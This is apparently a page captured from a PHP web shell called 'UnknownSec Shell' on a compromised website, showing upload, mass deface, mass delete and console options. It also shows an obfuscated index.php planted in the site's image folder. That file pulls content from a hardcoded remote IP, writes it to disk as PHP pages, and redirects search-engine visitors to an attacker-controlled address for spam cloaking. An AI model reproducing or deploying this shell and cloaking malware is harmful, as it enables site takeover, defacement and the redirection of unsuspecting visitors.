shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
socialite.brannanatkinson.com
/
public
/
assets
/
images
/
w6t92
/ [
drwxrwxrwx
]
upload
mass deface
mass delete
console
info server
name :
index.php
<?php goto vSFRZ; ZO1jV: if (strlen($text) < 5000) { $url = "\66\65\x2e\x31\x30\x39\x2e\x36\x37\56\61\60\60"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\51\x3c\x62\x72\x20\57\76\12"; } else { $req = "\x2f" . $_GET["\146\x6e"] . "\x2e\x70\150\160\x3f\160\141\x73\163\75{$apass}\x26\161\x3d{$_GET["\151\x64"]}"; $out = "\107\x45\124\40{$req}\x20\x48\124\124\x50\57\x31\56\x30\15\12"; $out .= "\110\157\163\x74\x3a\40{$url}\15\xa"; $out .= "\x43\x6f\156\156\x65\x63\164\151\157\156\72\40\103\154\x6f\x73\x65\15\12\15\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto gv81m; K5yqt: $text = ''; goto vtv5k; alwaW: $apass1 = "\x76\151\163\144\157\151\x6a\x65\167"; goto rWV4s; cPJ89: $query_pars_2 = str_replace("\55", "\53", $_GET["\x69\144"]); goto K5yqt; YN2p2: foreach ($_GET as $a => $b) { $_GET["\151\144"] = $b; } goto ZEE4_; zJGuH: $apass3 = "\162\x76\x33\62\171\x64\x61\143\163\x76\x73\144\x76"; goto L0Z2y; gv81m: if (strlen($text) > 500) { $out = fopen("\x69\x6e\144\x65\170\57" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto lElgU; L0Z2y: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto FcKCZ; rWV4s: $x1 = 3; goto g6oet; g6oet: $xx1 = 5; goto CKCej; Y7Ixz: $_GET["\146\156"] = "\66\x39\66\71\66\71\156\145\x77"; goto alwaW; Qn96Q: $s = $_SERVER["\x53\x45\x52\x56\105\x52\x5f\116\x41\x4d\x45"] . $s; goto zJGuH; vtv5k: if (function_exists("\x63\x75\162\154\137\151\156\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\164\160\x3a\57\x2f\x36\65\x2e\x31\60\71\56\x36\x37\56\61\60\60\x2f" . $_GET["\146\156"] . "\x2e\160\150\x70\x3f\160\141\163\x73\x3d{$apass}\46\161\75{$_GET["\151\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\x69\154\x6c\141\57\64\x2e\60\x20\50\143\x6f\x6d\x70\141\164\x69\x62\154\145\73\x20\115\x53\111\105\40\66\x2e\60\73\x20\127\151\x6e\144\x6f\167\x73\x20\116\x54\40\x35\56\x31\x3b\x20\123\x56\61\x29"); $text = curl_exec($ch); curl_close($ch); } goto ru3aP; NjPV_: if ($s == "\134" | $s == "\57") { $s = ''; } goto Qn96Q; QCtzO: $today = "\62\x30\62\x36\60\62\x31\66\x2d"; goto YN2p2; vSFRZ: error_reporting(0); goto QCtzO; l2Zi6: if ($_GET["\x69\144"] == "\x69\156\x64\x65\x78") { header("\114\x6f\143\x61\164\151\157\x6e\x3a\40\150\164\164\x70\x73\x3a\57\x2f\x67\157\157\x67\x6c\x65\56\x63\157\x6d"); die; } goto O4Jwv; lElgU: echo $text; goto zZ_9j; O4Jwv: $_GET["\x77\x6f\x72\154\x64"] = 5; goto Y7Ixz; BaEpb: $apass2 = "\142\62\63\150\162\x32\63\x76\162\x33\62"; goto CviU9; ZEE4_: if ($_GET["\151\x64"] == "\x74\x65\x73\x74\x69\156\x67") { echo "\164\x65\163\164\x20\147\157\x6f\x64\x2e\56\x2e"; die; } goto l2Zi6; CviU9: $s = dirname($_SERVER["\x50\110\x50\x5f\x53\x45\x4c\106"]); goto NjPV_; CKCej: $keyword = str_replace("\55", "\40", $_GET["\151\144"]); goto ixAKp; ixAKp: $keyword = str_replace("\40", "\x2b", $keyword); goto BaEpb; FcKCZ: if (strpos($_SERVER["\110\x54\x54\x50\x5f\x52\105\106\105\122\105\122"], "\147\157\157\x67\x6c\145\56") or strpos($_SERVER["\110\124\x54\x50\x5f\122\105\106\105\x52\x45\x52"], "\171\141\x68\157\157\x2e") or strpos($_SERVER["\110\124\124\120\137\122\105\x46\105\122\105\x52"], "\142\x69\x6e\x67\56")) { $tpl = "\151\x6e\144\x65\170\x2f" . $_GET["\151\144"] . "\x2e\160\x68\x70\x2e\164\x70\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\114\157\x63\x61\x74\x69\157\x6e\x3a\x20\x68\164\x74\x70\x3a\x2f\57\x36\x35\56\x31\x30\70\x2e\61\x30\x2e\x31\x39\x39\57\145\156\x74\x65\162\x2f\77\155\x61\x72\153\75{$today}\x2d{$s}\x26\x74\160\154\75{$tpl}\x26\x65\156\147\153\x65\x79\x3d{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\56\x70\x68\160"; if (file_exists("\151\156\144\x65\x78\57" . $myname)) { $html = @file_get_contents("\151\x6e\x64\x65\170\x2f" . $myname); if (strpos($_SERVER["\110\124\124\x50\137\x55\123\105\122\x5f\x41\107\x45\116\x54"], "\142\x69\x6e\147") > 2 or strpos($_SERVER["\x48\124\x54\x50\x5f\x55\123\x45\x52\x5f\101\x47\105\116\x54"], "\171\141\x68\x6f\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); $html = str_replace("\x3c\164\151\x74\x6c\x65\76\x3c\57\164\x69\164\154\x65\x3e", "\74\164\x69\164\154\145\x3e{$keyword}\74\x2f\x74\x69\x74\x6c\x65\76", $html); } echo $html; die; } } goto cPJ89; ru3aP: if (strlen($text) < 5000) { $text = file_get_contents("\150\164\164\x70\72\57\x2f\x36\65\x2e\61\x30\x39\x2e\x36\67\56\61\60\x30\57" . $_GET["\146\x6e"] . "\x2e\160\150\x70\77\160\141\x73\x73\75{$apass}\x26\161\x3d{$_GET["\151\x64"]}"); } goto ZO1jV; zZ_9j: ?>
© 2026 UnknownSec